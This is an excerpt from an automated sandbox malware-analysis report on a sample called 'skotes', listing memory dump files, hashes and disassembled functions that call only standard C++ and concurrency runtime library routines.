Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
String ID:
API String ID: 2885714658-0
Opcode ID: 09c9975045ead28a40bb9c92e3525ee98957fa342b135606cb49f09345b205a6
Instruction ID: 830fca1254446cd9d3f95c61a4adc8c9db5f9883738eef5f43e18e33b4b93a67
Opcode Fuzzy Hash: 09c9975045ead28a40bb9c92e3525ee98957fa342b135606cb49f09345b205a6
Instruction Fuzzy Hash: 2C41CF32A062449ADF26FBA484557FC77B56F95704F18C0A8E89D6F2C3DB394E04C762

Function 0097E7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0097E7D7

Part of subcall function 0097E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0097E577
Part of subcall function 0097E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0097E599

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0097E854
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0097E860
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0097E86F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0097E879
Concurrency::location::_Assign.LIBCMT ref: 0097E8AD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0097E8B5

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 6ca8fa6ea039ef3c71072e71978bfcad2c615c64ed18dd903d26a281ebe556c5
Instruction ID: 8807a15697e5caacb4af0dc6ba86f3f51b108852bd3f9367240a6111e5e2b3ce
Opcode Fuzzy Hash: 6ca8fa6ea039ef3c71072e71978bfcad2c615c64ed18dd903d26a281ebe556c5
Instruction Fuzzy Hash: 84410A76A00208DFCF05EF64C495BADB7B9FF88310F1480A9DD599B382DB34A941CB91

Function 00966E00 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00966ED1
std::_Rethrow_future_exception.LIBCPMT ref: 00966F22
std::_Rethrow_future_exception.LIBCPMT ref: 00966F32
__Mtx_unlock.LIBCPMT ref: 00966FD5
__Mtx_unlock.LIBCPMT ref: 009670DB
__Mtx_unlock.LIBCPMT ref: 00967116

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID:
API String ID: 1997747980-0
Opcode ID: fff981a02820d93778b52642dacebab1ddaac699b5605f2b0c81b20fdaf3d6d4
Instruction ID: 383469df6b1af9f1957644ed5c9f64e245415e63924ec4e3aa410b3fd16f70a7
Opcode Fuzzy Hash: fff981a02820d93778b52642dacebab1ddaac699b5605f2b0c81b20fdaf3d6d4
Instruction Fuzzy Hash: E6C1E1B09082049FDB21DFB4C945BAEBBF8EF45314F00456EE85697681EB35A948CBA1

Function 009744DE Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00974538
ListArray.LIBCONCRT ref: 0097456C
Hash.LIBCMT ref: 009745D5
Hash.LIBCMT ref: 009745E5

Part of subcall function 00979C41: std::bad_exception::bad_exception.LIBCMT ref: 00979C63

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0097474B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009747A4

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
String ID:
API String ID: 3010677857-0
Opcode ID: 5559392f330619886818566165f6116f27d3c33822a15d69c47f92dfcab0569d
Instruction ID: 91a3b256d5bb73f2af4735f50ed33b352b8656b970287c09d397b4386a4db04a
Opcode Fuzzy Hash: 5559392f330619886818566165f6116f27d3c33822a15d69c47f92dfcab0569d
Instruction Fuzzy Hash: 00814FB1A11B52BAD708DF78C845BD9FAA8BF49704F10831AF52C97281DBB4A524CBD1

Function 0096EE5F Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0096EEBC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0096EEC8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0096EEE1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0096EF0F
Concurrency::Context::Block.LIBCONCRT ref: 0096EF31

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
